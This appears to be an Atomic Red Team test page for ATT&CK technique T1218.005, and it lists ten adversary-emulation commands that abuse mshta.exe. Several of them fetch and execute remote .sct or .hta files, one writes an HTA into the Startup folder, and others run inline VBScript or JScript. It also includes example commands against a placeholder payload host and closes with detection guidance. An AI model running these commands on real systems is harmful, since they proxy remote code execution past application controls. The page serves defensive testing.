# T1218.005 - Mshta
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

## Atomic Tests

### Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObjectTest execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();
```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 1

### Atomic Test #2 - Mshta executes VBScript to execute malicious commandRun a local VB script to run local user enumeration powershell command.
This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
Upon execution, a new PowerShell windows will be opened that displays user information.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close")
```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 2

### Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$var =Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta"
$var.content|out-file "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta"
mshta "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta"
start-sleep -s 15
stop-process -name "calculator" -Force
```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 3

#### Cleanup: 
```powershell
remove-item "$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine JScript -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath $env:windir\system32\mshta.exe```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 4

### Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click
Executes an HTA Application using JScript script engine simulating double click.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine JScript -SimulateUserDoubleClick```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 5

### Atomic Test #6 - Invoke HTML Application - Direct download from URI
Executes an HTA Application by directly downloading from remote URI.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath $env:windir\system32\mshta.exe```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 6

### Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-ATHHTMLApplication -ScriptEngine JScript -InlineProtocolHandler About -UseRundll32 -Rundll32FilePath $env:windir\system32\rundll32.exe```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 7

### Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler
Executes an HTA Application with JScript Engine and Inline Protocol Handler.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-ATHHTMLApplication -ScriptEngine JScript -InlineProtocolHandler About -MSHTAFilePath $env:windir\system32\mshta.exe```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 8

### Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path
Executes an HTA Application with Simulate lateral movement over UNC Path.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath $env:windir\system32\mshta.exe```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 9

### Atomic Test #10 - Mshta used to Execute PowerShellUse Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205"""))</script>'"
```

In [ ]:
Invoke-AtomicTest T1218.005 -TestNumbers 10

## Detection
Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.

Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious